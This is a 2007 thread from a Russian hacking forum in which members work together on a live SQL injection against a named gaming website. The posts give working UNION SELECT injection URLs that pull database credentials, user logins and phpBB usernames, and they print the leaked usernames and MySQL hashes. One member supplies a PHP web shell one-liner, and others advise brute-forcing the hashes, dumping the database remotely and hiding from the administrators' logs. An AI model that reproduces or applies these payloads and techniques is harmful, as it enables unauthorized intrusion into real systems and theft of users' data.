Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Вопрос о скуле (https://forum.antichat.xyz/showthread.php?t=49727)

inlanger 24.09.2007 12:37

Вопрос о скуле
 
При вводе:
Код:

http://www.gamersblock.com/reports.php?id=-159+union+select+1,2,3,user,password,6,7,8,1,1,1+from+mysql.user/*
Получаю
yroot
31a457464200908a

Но при вводе этого логина и паса в http://www.gamersblock.com/admin
мне пишет что не правильный пароль. Почему?

Joker-jar 24.09.2007 12:43

31a457464200908a - не пароль, а хэш MySQL. Это раз. Во-вторых, не факт, что пара от БД подойдет к админке...

v1ru$ 24.09.2007 12:46

yroot:31a457464200908a -хеш mysql,бруть его или оставь запрос тут

groundhog 24.09.2007 13:19

От какого пользователся работает пага? То, что ты выковырял - учётные данные из системного каталога MySQL 4.X. То есть это реквизиты аккаунта суперпользователся для подключения к БД и они НИКАКОГО отношения к админке не имеют (исключая случай, что админ лопух и везде использует одни и те же логин/пароль). Если на их хосте МУСКЛЬ торчит яйцами наружу, то сбрутив пасс по админскому хешу, ты сможешь подключиться к ней извне и слить все имеющиеся там базы данных. Но я больше чем уверен, что мускль зацеплен только за localhost. В любом случае - ты можешь попытаться подобрать имена таблицы и столбцов, в которых хранятся реальные данные мемберов сломанной паги. Но если у тебя страничка крутится от root, тут есть возможность залить простенький вебшелл, а там уже возможности побогаче...

З.Ы. А ты уверен, что у полученной учётной записи y стоит перед root? Это не мусор?

inlanger 24.09.2007 13:29

Цитата:

З.Ы. А ты уверен, что у полученной учётной записи y стоит перед root? Это не мусор?
ну, код скули я оставил, посмотри. Вроде не лишнее.
Цитата:

сбрутив пасс по админскому хешу, ты сможешь подключиться к ней извне и слить все имеющиеся там базы данных
можно узнать, как єто делается? (можно и в виде ссылок).
просто это моя первая скуля, и хочется дальше развиваться в этом направлении

Joker-jar 24.09.2007 13:32

Подключиться можно с помощью putty, если под виндой сидишь, но, как сказал groundhog, тебя скорей всего ждет облом

inlanger 24.09.2007 13:33

Цитата:

тут есть возможность залить простенький вебшелл, а там уже возможности побогаче...
а это тогда о чём?

Scipio 24.09.2007 13:37

вобщем так:
Код:

http://www.gamersblock.com/reports.php?id=-159+union+select+1,2,3,4,aes_decrypt(aes_encrypt(USER_LOGIN,0x71),0x71),6,7,8,1,1,1+from+users/*
а поле с паролями сам ищи... я посмотрел, не нашел... но у меня и времени особо нет, чтоб это выискивать...

полученные данные скорее всего подойдут к админке (будем надеяться)

там еще форум есть phpBB, но кроме Anonymous никакой учетки выдрать неудалось:
Код:

http://www.gamersblock.com/reports.php?id=-159+union+select+1,2,3,4,aes_decrypt(aes_encrypt(username,0x71),0x71),6,7,8,1,1,1+from+phpbb.phpbb_users/*
зы:user() - mroca@localhost filepriv нет

groundhog 24.09.2007 13:40

Цитата:

тут есть возможность залить простенький вебшелл, а там уже возможности побогаче...
Я имею в виду, что если у тебя пага крутится от рута, то значит ты через скулю сможешь залить вебшелл, т.е. с помощью запроса создать файлик в контексте веб-сервера с содержимым типа:

Цитата:

<?php system($_GET["cmd"]); ?>
Цитата:

можно узнать, как єто делается? (можно и в виде ссылок).
Я имею в виду, в случае "торчания" мускла наружу и зная пасс админа, ты можешь любым mysql клиентом присоединиться к ихнему хосту и слить базу, тебе даже не нужно будет получать какие-то права на веб-сервере. Можно стандартно через MySQL Control Center, EMS MySQL Manager, MySQL Front... Клиентов дофига я не могу их тут перечислять... Только носки не забудь натянуть, а то злые админы в логах посмортят кто и когда что-то сливал.

Scipio 24.09.2007 13:57

Там в табличке users (не mysql.user) есть пользователь mroca как и пользователь бд, так вот мож его пароль от бд подойдет к админке:
Код:

http://www.gamersblock.com/reports.php?id=-159+union+select+1,2,3,concat(user,0x3a,password),5,6,7,8,1,1,1+from+mysql.user%20where%20user=CHAR(109,114,111,99,97)/*
mroca:3785da1b4f22cdc9

расшифровывай хеш: 3785da1b4f22cdc9 (MySql) и пробуй


Время: 21:15